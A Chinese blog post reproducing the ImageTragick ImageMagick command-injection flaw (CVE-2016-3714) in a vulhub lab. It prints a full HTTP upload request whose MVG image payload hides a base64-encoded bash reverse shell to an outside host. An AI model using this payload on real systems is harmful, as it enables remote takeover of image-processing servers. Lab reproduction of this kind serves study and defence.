Imagetragick 命令执行漏洞(CVE-2016-3714)

最新推荐文章于 2023-05-24 16:48:01 发布
最新推荐文章于 2023-05-24 16:48:01 发布
阅读量444 收藏 1
点赞数 1
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/118380628
版权

漏洞背景

ImageMagick是美国ImageMagick Studio公司的一套开源的图象处理软件。该软件可读取、转换、写入多种格式的图片。 ImageMagick 6.9.3-10之前版本和7.0.1-1之前7.x版本的多个编码器(EPHEMERAL,HTTPS,MVG,MSL,TEXT,SHOW,WIN,PLT)中存在远程代码执行漏洞,该漏洞源于程序没有充分过滤用户传入的shell字符。攻击者可通过上传恶意的图像利用该漏洞执行任意代码,获取敏感信息。

漏洞复现

访问http://your-ip:8080/即可查看到一个上传组件
在这里插入图片描述
我们直接反弹shell,先用nc监听端口:
在这里插入图片描述
发送数据包,执行反弹shell命令:

POST / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymdcbmdQR1sDse9Et
Content-Length: 328

------WebKitFormBoundarymdcbmdQR1sDse9Et
Content-Disposition: form-data; name="file_upload"; filename="1.gif"
Content-Type: image/png

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzAuMTI4Lzk5OTkgMD4mMQ== | base64 -d | bash`"||id " )'
pop graphic-context
------WebKitFormBoundarymdcbmdQR1sDse9Et--

(反弹shell命令在base64字符串内,自行更改)

发送数据包后,查看反弹shell
在这里插入图片描述

小 白 萝 卜
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bash: dotnet: 未找到命令..._命令执行
weixin_35890416的博客
12-21 2466
一、php命令执行常用的几个,shell_exec('whoami')可以简写为`whoami`,popen完全不回显。以下几个经常被disable_functions禁用<?php system('whoami'); passthru('whoami'); echo shell_exec('whoami'); echo exec('whoami'); popen('calc',"r"); ...
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
ImageMagick命令注入漏洞(CVE-2016–3714)
HEAVEN569的博客
06-28 1120
震惊!!看图片也能中招!
Maven打包package项目时提示:无效的目标发行版:17解决
weixin_56451428的博客
05-24 1646
设置的JDK版本是否与设置的一致 ,如下图。
ImageMagick命令注入漏洞(CVE-2016–3714)复现笔记
u011975363的专栏
06-18 2092
学习资料 https://www.cnblogs.com/bmjoker/p/9898590.html https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html 漏洞原理 ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。 但有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。 国外的安全人员为此新建了一个网站:
Imagetragick 命令执行漏洞CVE-2016–3714)
weixin_30376453的博客
07-25 365
Imagetragick介绍: ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。但近来有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞命令执行漏洞是出在 ImageMagick 对 https 形式的文件处理的过程中。 ImageMagick 之所以支...
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
解决OpenSSL "SSL-Death-Alert" 拒绝服务漏洞(CVE-2016-8610)安全漏洞,升级OpenSSL到OpenSSL 1.1.0k
10-25
最近放开了https服务,安全组扫描出新的漏洞,现对原OpenSSL 1.0.1g版本升级到OpenSSL 1.1.0k,同时重新编译OpenSSH及nginx,在此提供升级脚本,仅供参考
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
centos7.4 安全漏洞修复
yztezhl的专栏
12-22 1920
1.未设置密码尝试次数锁定 编辑以下文件/etc/pam.d/system-auth, /etc/pam.d/password-auth, /etc/pam.d/sshd, /etc/pam.d/login, /etc/pam.d/kscreensaver, /etc/pam.d/gdm-password, 在文件第一行加 auth required pam_tally2.so deny=3 unlock_time=300 even_deny_root root_unlock_time=600 2.账
Imagemagick 命令注入漏洞 (CVE-2016–3714)
zzzzz1284的博客
01-16 104
CVE-2016–3714
ImageMagick任意文件读取漏洞(CVE-2022-44268)
god_Zeo的安全博客
02-12 3545
爆出一个 ImageMagick 漏洞 CVE-2022-44268 ,在ImageMagick 7.1.0-51版本及以前 ,可以造成一个任意文件读取的危害比较可观,最近有时间来复现学习一下
ImageMagick 命令执行漏洞
kuiguowei的博客
01-16 2734
docker Docker是由一家叫做Dotcloud的公司出品。 Docker是一个由GO语言写的程序运行的容器; 目前云服务的基石是操作系统级别的隔离,在同一台物理服务器上虚拟出多个主机。Docker则实现了一种应用程序级别的隔离; 它改变我们基本的开发、操作单元,由直接操作虚拟主机(VM),转换到操作程序运行的“容器”上来。 它也是一个开源的应用容器引擎,让开发者可以打包他们的应用以及
[CVE-2016–3714]-Imagetragick 命令执行漏洞复现
https://www.cnblogs.com/zpchcbd/
08-13 721
路径:/root/vulhub/imagemagick/imagetragick 搭建:docker-compose up -d 打开地址:存在三个文件demo.php upload.php vul.jpg vul.jpg是攻击的模板 push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg...
php imagemagick 漏洞,ImageMagick漏洞(CVE-2016-3714)修复方案
weixin_33605464的博客
03-10 385
关于这个漏洞影响ImageMagick6.9.3-9以前是所有版本,包括ubuntu源中安装的ImageMagick。而官方在6.9.3-9版本中对漏洞进行了不完全的修复。所以,我们不能仅通过更新ImageMagick的版本来杜绝这个漏洞。现在,我们可以通过如下两个方法来暂时规避漏洞:处理图片前,先检查图片的 "magicbytes",也就是图片头,如果图片头不是你想要的格式,那么就不调用Imag...
热门开源软件ImageMagick中出现多个新漏洞
smellycat000的专栏
02-02 1567
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全研究员详述了开源软件 ImageMagick 中的两个漏洞详情,它们可导致拒绝服务和信息泄露后果。这两个漏洞是由拉美网络安全公司 etabase Q 在7.1.0-49版本中发现的,已在2022年11月发布的ImageMagick 7.1.0-52中修复。这两个漏洞CVE-2022-44267和CVE-2022-44268:前者是一个D...
TryHackMe - Anonforce靶场
z4yn:)的博客
03-12 153
Anonforce boot2root machine for FIT and bsides guatemala CTF 目录 0x01 信息收集 0x02 USER Falg 0x03 gpg2jogn 破解密码 0x04 hashcat破解root hash 0x05 ROOT Flag 0x01 信息收集 先Nmap扫端口开放服务,结果只开放了21,22端口 FTP有个匿名登录,好家伙直接整个根目录放了上来 0x02 USER Falg 登录到ftp服务 ..
PHP反序列化漏洞 CVE-2016
最新发布
07-28
PHP反序列化漏洞CVE-2016是指在PHP的序列化和反序列化过程中存在的安全漏洞。该漏洞被标记为CVE-2016-7124和CVE-2016-7125。 该漏洞的根本原因是在PHP的反序列化过程中没有对恶意输入进行充分的验证和过滤,导致攻击者可以构造恶意的序列化数据,触发代码执行或者其他不当行为。 攻击者可以通过在恶意序列化数据中注入恶意代码,利用这个漏洞执行任意代码、绕过访问控制、获取敏感信息等。这种漏洞可能导致严重后果,如服务器被入侵、数据泄露等。 为了修复这个漏洞,PHP开发团队在PHP 7.0.14、PHP 5.6.29和PHP 5.5.38版本中引入了一些安全修复措施,包括对反序列化输入进行验证和过滤,以及增强了一些相关函数的安全性。因此,如果你使用的是PHP的较新版本,那么你可能已经得到了修复。 为了保护自己的应用程序免受这个漏洞的影响,建议你及时更新PHP版本,并确保你的代码对用户输入进行充分的验证和过滤,尽可能避免使用不受信任的反序列化数据。同时,你也可以考虑使用其他安全措施,如输入过滤、安全编码等来增强应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值